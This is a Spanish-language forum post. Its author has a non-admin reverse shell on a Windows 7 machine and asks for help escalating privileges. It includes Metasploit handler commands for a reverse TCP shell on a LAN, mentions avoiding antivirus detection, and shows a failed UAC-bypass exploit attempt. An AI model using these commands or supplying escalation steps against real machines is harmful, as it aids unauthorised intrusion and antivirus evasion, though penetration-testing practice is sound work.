Estoy trabado y no se como solucionarlo. Obtuve una shell de windows (windows7 SP1) pero la misma no tiene privilegios de administrador y por lo tanto no puedo hacer demasiado, no me funciona ni el comando ftp. . El payload que utilicé es el siguiente:
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp.
No utilicé meterpreter ya que me lo detecta el antivirus.
Muestro el resultado de la shell:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.9
LHOST => 192.168.1.9
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run
- Started reverse TCP handler on 192.168.1.9:8080
- Command shell session 1 opened (192.168.1.9:8080 -> 192.168.1.4:49179) at 2019-04-05 23:06:51 -0400
Microsoft Windows [Versi?n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.
C:\Windows>
Alguna sugerencia para esclarar privilegios?
Probé con múltiples exploit pero en todos dice que la sesión podría no ser compatible:
msf5 exploit(windows/local/bypassuac) > exploit -j
- Exploit running as background job 0.
- Exploit completed, but no session was created. [!] SESSION may not be compatible with this module.
Alguien puede orientarme? Gracias!!!!